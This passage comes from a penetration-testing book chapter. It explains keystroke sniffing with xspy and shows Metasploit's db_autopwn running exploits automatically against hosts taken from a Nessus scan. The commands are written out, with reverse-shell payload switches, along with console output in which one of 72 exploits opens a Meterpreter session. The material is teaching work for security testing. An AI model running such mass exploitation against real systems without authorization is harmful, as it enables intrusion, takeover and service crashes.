56
Chapter 4
The
xspy
tool remotely sniffs the X server’s keyboard session and has cap-
tured a user running SSH to log in as root on a remote system. Vulnerabilities
such as this can be rare, but when you find them they are extremely valuable.
Using Scan Results for Autopwning
Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool auto-
matically targets and exploits a system using an open port or using the results
of a vulnerability scan export. You can use Autopwn to harness the results of
most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.
For example, here’s how we could use a Nessus results import to target a
system and autopwn it. Create a new database with
db_connect
and use
db_import
to import the scan report. In the next example, we run
db_autopwn
with a
series of switches to launch attacks against all targets (
e
), show all matching
modules (
t
), use a reverse shell payload (
r
), select exploit modules based on
vulnerability (
x
), and also select based on open ports (
p
). Once
db_autopwn
launches, Metasploit begins launching exploits at the targets. Successful
exploits return a shell to the attacking machine.
msf >
db_connect postgres:toor@127.0.0.1/msf3
msf >
db_import /root/nessus.nbe
msf >
db_autopwn –e –t –r -x -p
[*] (
1/72
[0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin
against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against
192.168.33.130:445...
. . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session
1 opened
(192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...
Based on these scans, Autopwn launched 72 exploits and one was suc-
cessful, as shown at . This exploit allows us full access to the machine with a
Meterpreter console that will be discussed in far more depth in Chapter 6.
NOTE
One big caveat to remember when using Autopwn: If you’re going in with your Autopwn
guns blazing, the target system can crash or lose stability. Autopwn has useful features
not covered here, such as the ability to select only exploits that have an “Excellent” rank-
ing, meaning it is very unlikely they will crash the remote system or service. For more
information on its usage, enter
db_autopwn –h
.